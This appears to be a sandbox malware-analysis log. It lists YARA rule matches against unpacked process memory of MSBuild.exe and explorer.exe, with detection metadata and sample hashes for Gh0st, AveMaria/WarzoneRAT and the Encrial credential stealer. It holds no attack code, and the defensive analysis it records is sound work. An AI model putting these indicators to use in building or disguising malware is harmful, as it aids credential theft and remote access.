Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
